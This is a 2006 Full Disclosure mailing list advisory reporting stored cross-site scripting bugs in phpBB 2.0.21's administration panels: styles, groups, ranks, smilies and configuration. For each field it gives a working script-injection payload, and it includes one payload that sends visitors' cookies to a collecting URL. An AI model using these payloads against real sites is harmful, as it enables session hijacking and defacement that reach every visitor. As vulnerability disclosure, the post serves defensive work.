Full Disclosure mailing list archives
phpBB Multiple HTML Injection Vulnerabilities
From: "Renatrix Renatrix" <renatrix () gmail com>
Date: Sat, 15 Jul 2006 12:05:29 +0200
phpBB 2.0.21 XSS in administration ********************************** //-- By Blwood [renatrix () gmail com] //-- [ http://www.blwood.net ] //-- Style Admin ----------- Management & Create a theme Lots of input are not properly sanitized like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)... We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1> but it's more interresting to inject javascript :) : "><body onload="alert('Owned by Blwood')"> => style_name "><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ... When an admin will go in Style Administration he will be Owned. (inject in style_name) When an admin will edit a them he will be Owned. Group Administration -------------------- Management Input group_description is not correctly sanitized we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script> When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php by every visitors. An exploit could be : </textarea>"><script> document.location='http://127.0.0.1/cookie.php?'+document.cookie</script> or </textarea>"><script>document.location='http://site.com/ownedpage.html' </script> Ranks ----- Rank Administration Rank Title (input title) is not correctly sanitized, we can inject js like : "><script>alert('xss')</script> But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :) Now you can inject what you want but maximum 40 caracters... Smilies ------- Smiles Editing Utility Smiley Code : "><body onload="alert('Owned by Blwood')"> Configuration ------------- General Configuartion Inputs are not correctly sanitized : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script> [ Video ] http://www.blwood.net/advisory/phpbb2021xssadmin.rar
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- phpBB Multiple HTML Injection Vulnerabilities Renatrix Renatrix (Jul 15)